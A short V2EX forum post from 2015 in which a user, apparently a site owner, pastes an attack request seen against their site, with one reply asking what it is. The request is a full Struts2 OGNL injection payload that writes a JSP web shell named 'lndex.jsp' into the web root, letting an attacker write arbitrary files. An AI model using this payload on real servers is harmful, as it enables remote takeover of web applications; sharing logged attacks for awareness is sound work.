Java 躺枪

2015-07-12 23:55:44 +08:00
 zhaiduo

/index.php?redirect:${#req=#context.get('com.opensymphony.xwork2.dispa Match1:{#req=#context.get('com.opensymphony.xwork2.dispatcher.httpservletrequest'),#res=#context.get('com.opensymphony.xwork2.dispatcher.httpservletresponse'),#res.getwriter().println(.okokok.),#res.getwriter().flush(),#res.getwriter().close(),new java.io.bufferedwriter(new java.io.filewriter(#req.getrealpath(./.)+.lndex.jsp.)).append(#req.getparameter(.shell.)).close()}&shell=<%if(request.getparameter(.f.)!=null)(new java.io.fileoutputstream(application.getrealpath(./.)+request.getparameter(.f.))).write(request.getparameter(.t.).getbytes());%><a href=.one_ok.></a> Match2:&redirect:${#req=#context.get('com.opensymphony.xwork2.dispatcher.httpservletrequest'),#res=#context.get('com.opensymphony.xwork2.dispatcher.httpservletresponse'),#res.getwriter().println(.okokok.),#res.getwriter().flush(),#res.getwriter().close(),new java.io.bufferedwriter(new java.io.filewriter(#req.getrealpath(./.)+.lndex.jsp.)).append(#req.getparameter(.shell.)).close()}&shell=<%if(request.getparameter(.f.)!=null)(new java.io.fileoutputstream(application.getrealpath(./.)+request.getparameter(.f.))).write(request.getparameter(.t.).getbytes());%><a href=.one_ok.></a>

5002 次点击
所在节点    站长
1 条回复
unique
2015-07-13 08:51:01 +08:00
这是什么鬼

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/205210

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX